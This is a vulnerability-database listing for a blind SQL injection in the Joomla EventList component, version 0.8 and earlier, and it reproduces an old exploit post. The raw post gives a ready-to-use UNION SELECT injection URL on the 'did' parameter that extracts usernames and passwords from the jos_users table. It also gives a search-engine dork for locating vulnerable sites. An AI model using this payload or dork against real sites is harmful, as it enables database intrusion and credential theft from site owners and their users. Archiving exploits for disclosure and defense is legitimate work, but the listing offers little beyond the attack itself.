header-logo
Suggest Exploit
vendor:
Component EventList
by:
ajann
7.5
CVSS
HIGH
Remote Blind SQL Injection
89
CWE
Product Name: Component EventList
Affected Version From: 0.8
Affected Version To: 0.8
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Joomla Component EventList <= 0.8 (did) Remote Blind SQL Injection Vulnerability

The Joomla Component EventList version 0.8 and below is vulnerable to a remote blind SQL injection. The vulnerability allows an attacker to inject malicious SQL code through the 'did' parameter in the 'details' function of the 'com_eventlist' module. An example exploit is provided in the text.

Mitigation:

Upgrade to a patched version of the Joomla Component EventList.
Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  Joomla Component EventList <= 0.8 (did) Remote Blind SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.schlu.net/
# $$      :  Free
# Dork    :  intext:"Event List 0.8 Alpha by schlu.net "
# DorkEx  :  http://www.google.com.tr/search?q=intext:%22Event+List+0.8+Alpha+by+schlu.net+%22&hl=tr&start=0&sa=N

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//index.php?option=com_eventlist&func=details&did=[SQL Inject]

Example:

//index.php?option=com_eventlist&func=details&did=9999999999999%20union%20select%200,0,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),4,5,6,7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0%20from%20jos_users/*

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-08-23]